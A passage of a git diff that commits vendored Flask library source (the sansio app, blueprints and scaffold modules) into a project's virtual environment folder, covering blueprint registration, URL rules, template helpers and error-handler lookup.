debugger will be shown for unhandled + exceptions, and the server will be reloaded when code changes. This maps to the + :data:`DEBUG` config key. It may not behave as expected if set late. + + **Do not enable debug mode when deploying in production.** + + Default: ``False`` + """ + return self.config["DEBUG"] + + @debug.setter + def debug(self, value: bool) -> None: + self.config["DEBUG"] = value + + if self.config["TEMPLATES_AUTO_RELOAD"] is None: + self.jinja_env.auto_reload = value + + @setupmethod + def register_blueprint(self, blueprint: Blueprint, **options: t.Any) -> None: + """Register a :class:`~flask.Blueprint` on the application. Keyword + arguments passed to this method will override the defaults set on the + blueprint. 
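# Illustrative sketch (not from the vendored Flask source above): with
# instance_relative_config=True, make_config() uses the instance path
# (located by auto_find_instance_path(), an instance/ folder next to the
# package by default) as the root for loading config files. The file name
# settings.py is an assumption for the example.
from flask import Flask

app = Flask(__name__, instance_relative_config=True)
print(app.instance_path)

# Resolved relative to app.instance_path rather than app.root_path.
app.config.from_pyfile("settings.py", silent=True)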
+ + Calls the blueprint's :meth:`~flask.Blueprint.register` method after + recording the blueprint in the application's :attr:`blueprints`. + + :param blueprint: The blueprint to register. + :param url_prefix: Blueprint routes will be prefixed with this. + :param subdomain: Blueprint routes will match on this subdomain. + :param url_defaults: Blueprint routes will use these default values for + view arguments. + :param options: Additional keyword arguments are passed to + :class:`~flask.blueprints.BlueprintSetupState`. They can be + accessed in :meth:`~flask.Blueprint.record` callbacks. + + .. versionchanged:: 2.0.1 + The ``name`` option can be used to change the (pre-dotted) + name the blueprint is registered with. This allows the same + blueprint to be registered multiple times with unique names + for ``url_for``. + + .. versionadded:: 0.7 + """ + blueprint.register(self, options) + + def iter_blueprints(self) -> t.ValuesView[Blueprint]: + """Iterates over all blueprints by the order they were registered. + + .. versionadded:: 0.11 + """ + return self.blueprints.values() + + @setupmethod + def add_url_rule( + self, + rule: str, + endpoint: str | None = None, + view_func: ft.RouteCallable | None = None, + provide_automatic_options: bool | None = None, + **options: t.Any, + ) -> None: + if endpoint is None: + endpoint = _endpoint_from_view_func(view_func) # type: ignore + options["endpoint"] = endpoint + methods = options.pop("methods", None) + + # if the methods are not given and the view_func object knows its + # methods we can use that instead. If neither exists, we go with + # a tuple of only ``GET`` as default. + if methods is None: + methods = getattr(view_func, "methods", None) or ("GET",) + if isinstance(methods, str): + raise TypeError( + "Allowed methods must be a list of strings, for" + ' example: @app.route(..., methods=["POST"])' + ) + methods = {item.upper() for item in methods} + + # Methods that should always be added + required_methods = set(getattr(view_func, "required_methods", ())) + + # starting with Flask 0.8 the view_func object can disable and + # force-enable the automatic options handling. + if provide_automatic_options is None: + provide_automatic_options = getattr( + view_func, "provide_automatic_options", None + ) + + if provide_automatic_options is None: + if "OPTIONS" not in methods: + provide_automatic_options = True + required_methods.add("OPTIONS") + else: + provide_automatic_options = False + + # Add the required methods now. + methods |= required_methods + + rule = self.url_rule_class(rule, methods=methods, **options) + rule.provide_automatic_options = provide_automatic_options # type: ignore + + self.url_map.add(rule) + if view_func is not None: + old_func = self.view_functions.get(endpoint) + if old_func is not None and old_func != view_func: + raise AssertionError( + "View function mapping is overwriting an existing" + f" endpoint function: {endpoint}" + ) + self.view_functions[endpoint] = view_func + + @setupmethod + def template_filter( + self, name: str | None = None + ) -> t.Callable[[T_template_filter], T_template_filter]: + """A decorator that is used to register custom template filter. + You can specify a name for the filter, otherwise the function + name will be used. Example:: + + @app.template_filter() + def reverse(s): + return s[::-1] + + :param name: the optional name of the filter, otherwise the + function name will be used. 
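# Illustrative sketch (not from the vendored Flask source above): the
# @app.route() decorator ultimately calls add_url_rule(), so a view can be
# registered by hand. Methods default to ("GET",) plus an automatic OPTIONS
# rule unless the view function opts out.
from flask import Flask

app = Flask(__name__)


def hello():
    return "hello"


app.add_url_rule("/hello", endpoint="hello", view_func=hello, methods=["GET", "POST"])
# Equivalent to decorating hello() with @app.route("/hello", methods=["GET", "POST"]).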
+ """ + + def decorator(f: T_template_filter) -> T_template_filter: + self.add_template_filter(f, name=name) + return f + + return decorator + + @setupmethod + def add_template_filter( + self, f: ft.TemplateFilterCallable, name: str | None = None + ) -> None: + """Register a custom template filter. Works exactly like the + :meth:`template_filter` decorator. + + :param name: the optional name of the filter, otherwise the + function name will be used. + """ + self.jinja_env.filters[name or f.__name__] = f + + @setupmethod + def template_test( + self, name: str | None = None + ) -> t.Callable[[T_template_test], T_template_test]: + """A decorator that is used to register custom template test. + You can specify a name for the test, otherwise the function + name will be used. Example:: + + @app.template_test() + def is_prime(n): + if n == 2: + return True + for i in range(2, int(math.ceil(math.sqrt(n))) + 1): + if n % i == 0: + return False + return True + + .. versionadded:: 0.10 + + :param name: the optional name of the test, otherwise the + function name will be used. + """ + + def decorator(f: T_template_test) -> T_template_test: + self.add_template_test(f, name=name) + return f + + return decorator + + @setupmethod + def add_template_test( + self, f: ft.TemplateTestCallable, name: str | None = None + ) -> None: + """Register a custom template test. Works exactly like the + :meth:`template_test` decorator. + + .. versionadded:: 0.10 + + :param name: the optional name of the test, otherwise the + function name will be used. + """ + self.jinja_env.tests[name or f.__name__] = f + + @setupmethod + def template_global( + self, name: str | None = None + ) -> t.Callable[[T_template_global], T_template_global]: + """A decorator that is used to register a custom template global function. + You can specify a name for the global function, otherwise the function + name will be used. Example:: + + @app.template_global() + def double(n): + return 2 * n + + .. versionadded:: 0.10 + + :param name: the optional name of the global function, otherwise the + function name will be used. + """ + + def decorator(f: T_template_global) -> T_template_global: + self.add_template_global(f, name=name) + return f + + return decorator + + @setupmethod + def add_template_global( + self, f: ft.TemplateGlobalCallable, name: str | None = None + ) -> None: + """Register a custom template global function. Works exactly like the + :meth:`template_global` decorator. + + .. versionadded:: 0.10 + + :param name: the optional name of the global function, otherwise the + function name will be used. + """ + self.jinja_env.globals[name or f.__name__] = f + + @setupmethod + def teardown_appcontext(self, f: T_teardown) -> T_teardown: + """Registers a function to be called when the application + context is popped. The application context is typically popped + after the request context for each request, at the end of CLI + commands, or after a manually pushed context ends. + + .. code-block:: python + + with app.app_context(): + ... + + When the ``with`` block exits (or ``ctx.pop()`` is called), the + teardown functions are called just before the app context is + made inactive. Since a request context typically also manages an + application context it would also be called when you pop a + request context. + + When a teardown function was called because of an unhandled + exception it will be passed an error object. If an + :meth:`errorhandler` is registered, it will handle the exception + and the teardown will not receive it. 
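# Illustrative sketch (not from the vendored Flask source above): a teardown
# function runs when the application context is popped, with the unhandled
# exception (or None) as its argument, and must not raise itself.
from flask import Flask, g

app = Flask(__name__)


@app.teardown_appcontext
def close_db(exc):
    db = g.pop("db", None)   # "db" is a hypothetical per-context resource
    if db is not None:
        db.close()


with app.app_context():
    pass                     # close_db(None) runs as this block exits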
+ + Teardown functions must avoid raising exceptions. If they + execute code that might fail they must surround that code with a + ``try``/``except`` block and log any errors. + + The return values of teardown functions are ignored. + + .. versionadded:: 0.9 + """ + self.teardown_appcontext_funcs.append(f) + return f + + @setupmethod + def shell_context_processor( + self, f: T_shell_context_processor + ) -> T_shell_context_processor: + """Registers a shell context processor function. + + .. versionadded:: 0.11 + """ + self.shell_context_processors.append(f) + return f + + def _find_error_handler( + self, e: Exception, blueprints: list[str] + ) -> ft.ErrorHandlerCallable | None: + """Return a registered error handler for an exception in this order: + blueprint handler for a specific code, app handler for a specific code, + blueprint handler for an exception class, app handler for an exception + class, or ``None`` if a suitable handler is not found. + """ + exc_class, code = self._get_exc_class_and_code(type(e)) + names = (*blueprints, None) + + for c in (code, None) if code is not None else (None,): + for name in names: + handler_map = self.error_handler_spec[name][c] + + if not handler_map: + continue + + for cls in exc_class.__mro__: + handler = handler_map.get(cls) + + if handler is not None: + return handler + return None + + def trap_http_exception(self, e: Exception) -> bool: + """Checks if an HTTP exception should be trapped or not. By default + this will return ``False`` for all exceptions except for a bad request + key error if ``TRAP_BAD_REQUEST_ERRORS`` is set to ``True``. It + also returns ``True`` if ``TRAP_HTTP_EXCEPTIONS`` is set to ``True``. + + This is called for all HTTP exceptions raised by a view function. + If it returns ``True`` for any exception the error handler for this + exception is not called and it shows up as regular exception in the + traceback. This is helpful for debugging implicitly raised HTTP + exceptions. + + .. versionchanged:: 1.0 + Bad request errors are not trapped by default in debug mode. + + .. versionadded:: 0.8 + """ + if self.config["TRAP_HTTP_EXCEPTIONS"]: + return True + + trap_bad_request = self.config["TRAP_BAD_REQUEST_ERRORS"] + + # if unset, trap key errors in debug mode + if ( + trap_bad_request is None + and self.debug + and isinstance(e, BadRequestKeyError) + ): + return True + + if trap_bad_request: + return isinstance(e, BadRequest) + + return False + + def should_ignore_error(self, error: BaseException | None) -> bool: + """This is called to figure out if an error should be ignored + or not as far as the teardown system is concerned. If this + function returns ``True`` then the teardown handlers will not be + passed the error. + + .. versionadded:: 0.10 + """ + return False + + def redirect(self, location: str, code: int = 302) -> BaseResponse: + """Create a redirect response object. + + This is called by :func:`flask.redirect`, and can be called + directly as well. + + :param location: The URL to redirect to. + :param code: The status code for the redirect. + + .. versionadded:: 2.2 + Moved from ``flask.redirect``, which calls this method. + """ + return _wz_redirect( + location, code=code, Response=self.response_class # type: ignore[arg-type] + ) + + def inject_url_defaults(self, endpoint: str, values: dict) -> None: + """Injects the URL defaults for the given endpoint directly into + the values dictionary passed. This is used internally and + automatically called on URL building. + + .. 
versionadded:: 0.7 + """ + names: t.Iterable[str | None] = (None,) + + # url_for may be called outside a request context, parse the + # passed endpoint instead of using request.blueprints. + if "." in endpoint: + names = chain( + names, reversed(_split_blueprint_path(endpoint.rpartition(".")[0])) + ) + + for name in names: + if name in self.url_default_functions: + for func in self.url_default_functions[name]: + func(endpoint, values) + + def handle_url_build_error( + self, error: BuildError, endpoint: str, values: dict[str, t.Any] + ) -> str: + """Called by :meth:`.url_for` if a + :exc:`~werkzeug.routing.BuildError` was raised. If this returns + a value, it will be returned by ``url_for``, otherwise the error + will be re-raised. + + Each function in :attr:`url_build_error_handlers` is called with + ``error``, ``endpoint`` and ``values``. If a function returns + ``None`` or raises a ``BuildError``, it is skipped. Otherwise, + its return value is returned by ``url_for``. + + :param error: The active ``BuildError`` being handled. + :param endpoint: The endpoint being built. + :param values: The keyword arguments passed to ``url_for``. + """ + for handler in self.url_build_error_handlers: + try: + rv = handler(error, endpoint, values) + except BuildError as e: + # make error available outside except block + error = e + else: + if rv is not None: + return rv + + # Re-raise if called with an active exception, otherwise raise + # the passed in exception. + if error is sys.exc_info()[1]: + raise + + raise error diff --git a/env/Lib/site-packages/flask/sansio/blueprints.py b/env/Lib/site-packages/flask/sansio/blueprints.py new file mode 100644 index 00000000..38c92f45 --- /dev/null +++ b/env/Lib/site-packages/flask/sansio/blueprints.py @@ -0,0 +1,626 @@ +from __future__ import annotations + +import os +import typing as t +from collections import defaultdict +from functools import update_wrapper + +from .. import typing as ft +from .scaffold import _endpoint_from_view_func +from .scaffold import _sentinel +from .scaffold import Scaffold +from .scaffold import setupmethod + +if t.TYPE_CHECKING: # pragma: no cover + from .app import App + +DeferredSetupFunction = t.Callable[["BlueprintSetupState"], t.Callable] +T_after_request = t.TypeVar("T_after_request", bound=ft.AfterRequestCallable) +T_before_request = t.TypeVar("T_before_request", bound=ft.BeforeRequestCallable) +T_error_handler = t.TypeVar("T_error_handler", bound=ft.ErrorHandlerCallable) +T_teardown = t.TypeVar("T_teardown", bound=ft.TeardownCallable) +T_template_context_processor = t.TypeVar( + "T_template_context_processor", bound=ft.TemplateContextProcessorCallable +) +T_template_filter = t.TypeVar("T_template_filter", bound=ft.TemplateFilterCallable) +T_template_global = t.TypeVar("T_template_global", bound=ft.TemplateGlobalCallable) +T_template_test = t.TypeVar("T_template_test", bound=ft.TemplateTestCallable) +T_url_defaults = t.TypeVar("T_url_defaults", bound=ft.URLDefaultCallable) +T_url_value_preprocessor = t.TypeVar( + "T_url_value_preprocessor", bound=ft.URLValuePreprocessorCallable +) + + +class BlueprintSetupState: + """Temporary holder object for registering a blueprint with the + application. An instance of this class is created by the + :meth:`~flask.Blueprint.make_setup_state` method and later passed + to all register callback functions. 
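# Illustrative sketch (not from the vendored Flask source above): each
# function appended to app.url_build_error_handlers gets a chance to turn a
# BuildError into a URL; returning None (or raising BuildError) skips to the
# next handler. The "docs" endpoint and URL below are invented for the example.
from flask import Flask, url_for

app = Flask(__name__)


def external_urls(error, endpoint, values):
    if endpoint == "docs":
        return "https://example.com/docs"
    return None


app.url_build_error_handlers.append(external_urls)

with app.test_request_context():
    assert url_for("docs") == "https://example.com/docs"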
+ """ + + def __init__( + self, + blueprint: Blueprint, + app: App, + options: t.Any, + first_registration: bool, + ) -> None: + #: a reference to the current application + self.app = app + + #: a reference to the blueprint that created this setup state. + self.blueprint = blueprint + + #: a dictionary with all options that were passed to the + #: :meth:`~flask.Flask.register_blueprint` method. + self.options = options + + #: as blueprints can be registered multiple times with the + #: application and not everything wants to be registered + #: multiple times on it, this attribute can be used to figure + #: out if the blueprint was registered in the past already. + self.first_registration = first_registration + + subdomain = self.options.get("subdomain") + if subdomain is None: + subdomain = self.blueprint.subdomain + + #: The subdomain that the blueprint should be active for, ``None`` + #: otherwise. + self.subdomain = subdomain + + url_prefix = self.options.get("url_prefix") + if url_prefix is None: + url_prefix = self.blueprint.url_prefix + #: The prefix that should be used for all URLs defined on the + #: blueprint. + self.url_prefix = url_prefix + + self.name = self.options.get("name", blueprint.name) + self.name_prefix = self.options.get("name_prefix", "") + + #: A dictionary with URL defaults that is added to each and every + #: URL that was defined with the blueprint. + self.url_defaults = dict(self.blueprint.url_values_defaults) + self.url_defaults.update(self.options.get("url_defaults", ())) + + def add_url_rule( + self, + rule: str, + endpoint: str | None = None, + view_func: t.Callable | None = None, + **options: t.Any, + ) -> None: + """A helper method to register a rule (and optionally a view function) + to the application. The endpoint is automatically prefixed with the + blueprint's name. + """ + if self.url_prefix is not None: + if rule: + rule = "/".join((self.url_prefix.rstrip("/"), rule.lstrip("/"))) + else: + rule = self.url_prefix + options.setdefault("subdomain", self.subdomain) + if endpoint is None: + endpoint = _endpoint_from_view_func(view_func) # type: ignore + defaults = self.url_defaults + if "defaults" in options: + defaults = dict(defaults, **options.pop("defaults")) + + self.app.add_url_rule( + rule, + f"{self.name_prefix}.{self.name}.{endpoint}".lstrip("."), + view_func, + defaults=defaults, + **options, + ) + + +class Blueprint(Scaffold): + """Represents a blueprint, a collection of routes and other + app-related functions that can be registered on a real application + later. + + A blueprint is an object that allows defining application functions + without requiring an application object ahead of time. It uses the + same decorators as :class:`~flask.Flask`, but defers the need for an + application by recording them for later registration. + + Decorating a function with a blueprint creates a deferred function + that is called with :class:`~flask.blueprints.BlueprintSetupState` + when the blueprint is registered on an application. + + See :doc:`/blueprints` for more information. + + :param name: The name of the blueprint. Will be prepended to each + endpoint name. + :param import_name: The name of the blueprint package, usually + ``__name__``. This helps locate the ``root_path`` for the + blueprint. + :param static_folder: A folder with static files that should be + served by the blueprint's static route. The path is relative to + the blueprint's root path. Blueprint static files are disabled + by default. 
+ :param static_url_path: The url to serve static files from. + Defaults to ``static_folder``. If the blueprint does not have + a ``url_prefix``, the app's static route will take precedence, + and the blueprint's static files won't be accessible. + :param template_folder: A folder with templates that should be added + to the app's template search path. The path is relative to the + blueprint's root path. Blueprint templates are disabled by + default. Blueprint templates have a lower precedence than those + in the app's templates folder. + :param url_prefix: A path to prepend to all of the blueprint's URLs, + to make them distinct from the rest of the app's routes. + :param subdomain: A subdomain that blueprint routes will match on by + default. + :param url_defaults: A dict of default values that blueprint routes + will receive by default. + :param root_path: By default, the blueprint will automatically set + this based on ``import_name``. In certain situations this + automatic detection can fail, so the path can be specified + manually instead. + + .. versionchanged:: 1.1.0 + Blueprints have a ``cli`` group to register nested CLI commands. + The ``cli_group`` parameter controls the name of the group under + the ``flask`` command. + + .. versionadded:: 0.7 + """ + + _got_registered_once = False + + def __init__( + self, + name: str, + import_name: str, + static_folder: str | os.PathLike | None = None, + static_url_path: str | None = None, + template_folder: str | os.PathLike | None = None, + url_prefix: str | None = None, + subdomain: str | None = None, + url_defaults: dict | None = None, + root_path: str | None = None, + cli_group: str | None = _sentinel, # type: ignore + ): + super().__init__( + import_name=import_name, + static_folder=static_folder, + static_url_path=static_url_path, + template_folder=template_folder, + root_path=root_path, + ) + + if not name: + raise ValueError("'name' may not be empty.") + + if "." in name: + raise ValueError("'name' may not contain a dot '.' character.") + + self.name = name + self.url_prefix = url_prefix + self.subdomain = subdomain + self.deferred_functions: list[DeferredSetupFunction] = [] + + if url_defaults is None: + url_defaults = {} + + self.url_values_defaults = url_defaults + self.cli_group = cli_group + self._blueprints: list[tuple[Blueprint, dict]] = [] + + def _check_setup_finished(self, f_name: str) -> None: + if self._got_registered_once: + raise AssertionError( + f"The setup method '{f_name}' can no longer be called on the blueprint" + f" '{self.name}'. It has already been registered at least once, any" + " changes will not be applied consistently.\n" + "Make sure all imports, decorators, functions, etc. needed to set up" + " the blueprint are done before registering it." + ) + + @setupmethod + def record(self, func: t.Callable) -> None: + """Registers a function that is called when the blueprint is + registered on the application. This function is called with the + state as argument as returned by the :meth:`make_setup_state` + method. + """ + self.deferred_functions.append(func) + + @setupmethod + def record_once(self, func: t.Callable) -> None: + """Works like :meth:`record` but wraps the function in another + function that will ensure the function is only called once. If the + blueprint is registered a second time on the application, the + function passed is not called. 
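A minimal sketch of constructing a blueprint with the parameters described above (the blueprint name, folders, and prefix are illustrative):

    from flask import Blueprint

    admin = Blueprint(
        "admin",                      # prepended to every endpoint name
        __name__,                     # used to locate root_path
        url_prefix="/admin",          # prepended to every URL rule
        static_folder="static",       # enables the blueprint static route
        template_folder="templates",  # added to the template search path
    )

    @admin.route("/")
    def index():
        return "admin index"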
+ """ + + def wrapper(state: BlueprintSetupState) -> None: + if state.first_registration: + func(state) + + self.record(update_wrapper(wrapper, func)) + + def make_setup_state( + self, app: App, options: dict, first_registration: bool = False + ) -> BlueprintSetupState: + """Creates an instance of :meth:`~flask.blueprints.BlueprintSetupState` + object that is later passed to the register callback functions. + Subclasses can override this to return a subclass of the setup state. + """ + return BlueprintSetupState(self, app, options, first_registration) + + @setupmethod + def register_blueprint(self, blueprint: Blueprint, **options: t.Any) -> None: + """Register a :class:`~flask.Blueprint` on this blueprint. Keyword + arguments passed to this method will override the defaults set + on the blueprint. + + .. versionchanged:: 2.0.1 + The ``name`` option can be used to change the (pre-dotted) + name the blueprint is registered with. This allows the same + blueprint to be registered multiple times with unique names + for ``url_for``. + + .. versionadded:: 2.0 + """ + if blueprint is self: + raise ValueError("Cannot register a blueprint on itself") + self._blueprints.append((blueprint, options)) + + def register(self, app: App, options: dict) -> None: + """Called by :meth:`Flask.register_blueprint` to register all + views and callbacks registered on the blueprint with the + application. Creates a :class:`.BlueprintSetupState` and calls + each :meth:`record` callback with it. + + :param app: The application this blueprint is being registered + with. + :param options: Keyword arguments forwarded from + :meth:`~Flask.register_blueprint`. + + .. versionchanged:: 2.3 + Nested blueprints now correctly apply subdomains. + + .. versionchanged:: 2.1 + Registering the same blueprint with the same name multiple + times is an error. + + .. versionchanged:: 2.0.1 + Nested blueprints are registered with their dotted name. + This allows different blueprints with the same name to be + nested at different locations. + + .. versionchanged:: 2.0.1 + The ``name`` option can be used to change the (pre-dotted) + name the blueprint is registered with. This allows the same + blueprint to be registered multiple times with unique names + for ``url_for``. + """ + name_prefix = options.get("name_prefix", "") + self_name = options.get("name", self.name) + name = f"{name_prefix}.{self_name}".lstrip(".") + + if name in app.blueprints: + bp_desc = "this" if app.blueprints[name] is self else "a different" + existing_at = f" '{name}'" if self_name != name else "" + + raise ValueError( + f"The name '{self_name}' is already registered for" + f" {bp_desc} blueprint{existing_at}. Use 'name=' to" + f" provide a unique name." + ) + + first_bp_registration = not any(bp is self for bp in app.blueprints.values()) + first_name_registration = name not in app.blueprints + + app.blueprints[name] = self + self._got_registered_once = True + state = self.make_setup_state(app, options, first_bp_registration) + + if self.has_static_folder: + state.add_url_rule( + f"{self.static_url_path}/", + view_func=self.send_static_file, # type: ignore[attr-defined] + endpoint="static", + ) + + # Merge blueprint data into parent. 
+ if first_bp_registration or first_name_registration: + self._merge_blueprint_funcs(app, name) + + for deferred in self.deferred_functions: + deferred(state) + + cli_resolved_group = options.get("cli_group", self.cli_group) + + if self.cli.commands: + if cli_resolved_group is None: + app.cli.commands.update(self.cli.commands) + elif cli_resolved_group is _sentinel: + self.cli.name = name + app.cli.add_command(self.cli) + else: + self.cli.name = cli_resolved_group + app.cli.add_command(self.cli) + + for blueprint, bp_options in self._blueprints: + bp_options = bp_options.copy() + bp_url_prefix = bp_options.get("url_prefix") + bp_subdomain = bp_options.get("subdomain") + + if bp_subdomain is None: + bp_subdomain = blueprint.subdomain + + if state.subdomain is not None and bp_subdomain is not None: + bp_options["subdomain"] = bp_subdomain + "." + state.subdomain + elif bp_subdomain is not None: + bp_options["subdomain"] = bp_subdomain + elif state.subdomain is not None: + bp_options["subdomain"] = state.subdomain + + if bp_url_prefix is None: + bp_url_prefix = blueprint.url_prefix + + if state.url_prefix is not None and bp_url_prefix is not None: + bp_options["url_prefix"] = ( + state.url_prefix.rstrip("/") + "/" + bp_url_prefix.lstrip("/") + ) + elif bp_url_prefix is not None: + bp_options["url_prefix"] = bp_url_prefix + elif state.url_prefix is not None: + bp_options["url_prefix"] = state.url_prefix + + bp_options["name_prefix"] = name + blueprint.register(app, bp_options) + + def _merge_blueprint_funcs(self, app: App, name: str) -> None: + def extend(bp_dict, parent_dict): + for key, values in bp_dict.items(): + key = name if key is None else f"{name}.{key}" + parent_dict[key].extend(values) + + for key, value in self.error_handler_spec.items(): + key = name if key is None else f"{name}.{key}" + value = defaultdict( + dict, + { + code: {exc_class: func for exc_class, func in code_values.items()} + for code, code_values in value.items() + }, + ) + app.error_handler_spec[key] = value + + for endpoint, func in self.view_functions.items(): + app.view_functions[endpoint] = func + + extend(self.before_request_funcs, app.before_request_funcs) + extend(self.after_request_funcs, app.after_request_funcs) + extend( + self.teardown_request_funcs, + app.teardown_request_funcs, + ) + extend(self.url_default_functions, app.url_default_functions) + extend(self.url_value_preprocessors, app.url_value_preprocessors) + extend(self.template_context_processors, app.template_context_processors) + + @setupmethod + def add_url_rule( + self, + rule: str, + endpoint: str | None = None, + view_func: ft.RouteCallable | None = None, + provide_automatic_options: bool | None = None, + **options: t.Any, + ) -> None: + """Register a URL rule with the blueprint. See :meth:`.Flask.add_url_rule` for + full documentation. + + The URL rule is prefixed with the blueprint's URL prefix. The endpoint name, + used with :func:`url_for`, is prefixed with the blueprint's name. + """ + if endpoint and "." in endpoint: + raise ValueError("'endpoint' may not contain a dot '.' character.") + + if view_func and hasattr(view_func, "__name__") and "." in view_func.__name__: + raise ValueError("'view_func' name may not contain a dot '.' 
character.") + + self.record( + lambda s: s.add_url_rule( + rule, + endpoint, + view_func, + provide_automatic_options=provide_automatic_options, + **options, + ) + ) + + @setupmethod + def app_template_filter( + self, name: str | None = None + ) -> t.Callable[[T_template_filter], T_template_filter]: + """Register a template filter, available in any template rendered by the + application. Equivalent to :meth:`.Flask.template_filter`. + + :param name: the optional name of the filter, otherwise the + function name will be used. + """ + + def decorator(f: T_template_filter) -> T_template_filter: + self.add_app_template_filter(f, name=name) + return f + + return decorator + + @setupmethod + def add_app_template_filter( + self, f: ft.TemplateFilterCallable, name: str | None = None + ) -> None: + """Register a template filter, available in any template rendered by the + application. Works like the :meth:`app_template_filter` decorator. Equivalent to + :meth:`.Flask.add_template_filter`. + + :param name: the optional name of the filter, otherwise the + function name will be used. + """ + + def register_template(state: BlueprintSetupState) -> None: + state.app.jinja_env.filters[name or f.__name__] = f + + self.record_once(register_template) + + @setupmethod + def app_template_test( + self, name: str | None = None + ) -> t.Callable[[T_template_test], T_template_test]: + """Register a template test, available in any template rendered by the + application. Equivalent to :meth:`.Flask.template_test`. + + .. versionadded:: 0.10 + + :param name: the optional name of the test, otherwise the + function name will be used. + """ + + def decorator(f: T_template_test) -> T_template_test: + self.add_app_template_test(f, name=name) + return f + + return decorator + + @setupmethod + def add_app_template_test( + self, f: ft.TemplateTestCallable, name: str | None = None + ) -> None: + """Register a template test, available in any template rendered by the + application. Works like the :meth:`app_template_test` decorator. Equivalent to + :meth:`.Flask.add_template_test`. + + .. versionadded:: 0.10 + + :param name: the optional name of the test, otherwise the + function name will be used. + """ + + def register_template(state: BlueprintSetupState) -> None: + state.app.jinja_env.tests[name or f.__name__] = f + + self.record_once(register_template) + + @setupmethod + def app_template_global( + self, name: str | None = None + ) -> t.Callable[[T_template_global], T_template_global]: + """Register a template global, available in any template rendered by the + application. Equivalent to :meth:`.Flask.template_global`. + + .. versionadded:: 0.10 + + :param name: the optional name of the global, otherwise the + function name will be used. + """ + + def decorator(f: T_template_global) -> T_template_global: + self.add_app_template_global(f, name=name) + return f + + return decorator + + @setupmethod + def add_app_template_global( + self, f: ft.TemplateGlobalCallable, name: str | None = None + ) -> None: + """Register a template global, available in any template rendered by the + application. Works like the :meth:`app_template_global` decorator. Equivalent to + :meth:`.Flask.add_template_global`. + + .. versionadded:: 0.10 + + :param name: the optional name of the global, otherwise the + function name will be used. 
+ """ + + def register_template(state: BlueprintSetupState) -> None: + state.app.jinja_env.globals[name or f.__name__] = f + + self.record_once(register_template) + + @setupmethod + def before_app_request(self, f: T_before_request) -> T_before_request: + """Like :meth:`before_request`, but before every request, not only those handled + by the blueprint. Equivalent to :meth:`.Flask.before_request`. + """ + self.record_once( + lambda s: s.app.before_request_funcs.setdefault(None, []).append(f) + ) + return f + + @setupmethod + def after_app_request(self, f: T_after_request) -> T_after_request: + """Like :meth:`after_request`, but after every request, not only those handled + by the blueprint. Equivalent to :meth:`.Flask.after_request`. + """ + self.record_once( + lambda s: s.app.after_request_funcs.setdefault(None, []).append(f) + ) + return f + + @setupmethod + def teardown_app_request(self, f: T_teardown) -> T_teardown: + """Like :meth:`teardown_request`, but after every request, not only those + handled by the blueprint. Equivalent to :meth:`.Flask.teardown_request`. + """ + self.record_once( + lambda s: s.app.teardown_request_funcs.setdefault(None, []).append(f) + ) + return f + + @setupmethod + def app_context_processor( + self, f: T_template_context_processor + ) -> T_template_context_processor: + """Like :meth:`context_processor`, but for templates rendered by every view, not + only by the blueprint. Equivalent to :meth:`.Flask.context_processor`. + """ + self.record_once( + lambda s: s.app.template_context_processors.setdefault(None, []).append(f) + ) + return f + + @setupmethod + def app_errorhandler( + self, code: type[Exception] | int + ) -> t.Callable[[T_error_handler], T_error_handler]: + """Like :meth:`errorhandler`, but for every request, not only those handled by + the blueprint. Equivalent to :meth:`.Flask.errorhandler`. + """ + + def decorator(f: T_error_handler) -> T_error_handler: + self.record_once(lambda s: s.app.errorhandler(code)(f)) + return f + + return decorator + + @setupmethod + def app_url_value_preprocessor( + self, f: T_url_value_preprocessor + ) -> T_url_value_preprocessor: + """Like :meth:`url_value_preprocessor`, but for every request, not only those + handled by the blueprint. Equivalent to :meth:`.Flask.url_value_preprocessor`. + """ + self.record_once( + lambda s: s.app.url_value_preprocessors.setdefault(None, []).append(f) + ) + return f + + @setupmethod + def app_url_defaults(self, f: T_url_defaults) -> T_url_defaults: + """Like :meth:`url_defaults`, but for every request, not only those handled by + the blueprint. Equivalent to :meth:`.Flask.url_defaults`. + """ + self.record_once( + lambda s: s.app.url_default_functions.setdefault(None, []).append(f) + ) + return f diff --git a/env/Lib/site-packages/flask/sansio/scaffold.py b/env/Lib/site-packages/flask/sansio/scaffold.py new file mode 100644 index 00000000..a43f6fd7 --- /dev/null +++ b/env/Lib/site-packages/flask/sansio/scaffold.py @@ -0,0 +1,802 @@ +from __future__ import annotations + +import importlib.util +import os +import pathlib +import sys +import typing as t +from collections import defaultdict +from functools import update_wrapper + +from jinja2 import FileSystemLoader +from werkzeug.exceptions import default_exceptions +from werkzeug.exceptions import HTTPException +from werkzeug.utils import cached_property + +from .. 
import typing as ft +from ..cli import AppGroup +from ..helpers import get_root_path +from ..templating import _default_template_ctx_processor + +# a singleton sentinel value for parameter defaults +_sentinel = object() + +F = t.TypeVar("F", bound=t.Callable[..., t.Any]) +T_after_request = t.TypeVar("T_after_request", bound=ft.AfterRequestCallable) +T_before_request = t.TypeVar("T_before_request", bound=ft.BeforeRequestCallable) +T_error_handler = t.TypeVar("T_error_handler", bound=ft.ErrorHandlerCallable) +T_teardown = t.TypeVar("T_teardown", bound=ft.TeardownCallable) +T_template_context_processor = t.TypeVar( + "T_template_context_processor", bound=ft.TemplateContextProcessorCallable +) +T_url_defaults = t.TypeVar("T_url_defaults", bound=ft.URLDefaultCallable) +T_url_value_preprocessor = t.TypeVar( + "T_url_value_preprocessor", bound=ft.URLValuePreprocessorCallable +) +T_route = t.TypeVar("T_route", bound=ft.RouteCallable) + + +def setupmethod(f: F) -> F: + f_name = f.__name__ + + def wrapper_func(self, *args: t.Any, **kwargs: t.Any) -> t.Any: + self._check_setup_finished(f_name) + return f(self, *args, **kwargs) + + return t.cast(F, update_wrapper(wrapper_func, f)) + + +class Scaffold: + """Common behavior shared between :class:`~flask.Flask` and + :class:`~flask.blueprints.Blueprint`. + + :param import_name: The import name of the module where this object + is defined. Usually :attr:`__name__` should be used. + :param static_folder: Path to a folder of static files to serve. + If this is set, a static route will be added. + :param static_url_path: URL prefix for the static route. + :param template_folder: Path to a folder containing template files. + for rendering. If this is set, a Jinja loader will be added. + :param root_path: The path that static, template, and resource files + are relative to. Typically not set, it is discovered based on + the ``import_name``. + + .. versionadded:: 2.0 + """ + + name: str + _static_folder: str | None = None + _static_url_path: str | None = None + + def __init__( + self, + import_name: str, + static_folder: str | os.PathLike | None = None, + static_url_path: str | None = None, + template_folder: str | os.PathLike | None = None, + root_path: str | None = None, + ): + #: The name of the package or module that this object belongs + #: to. Do not change this once it is set by the constructor. + self.import_name = import_name + + self.static_folder = static_folder # type: ignore + self.static_url_path = static_url_path + + #: The path to the templates folder, relative to 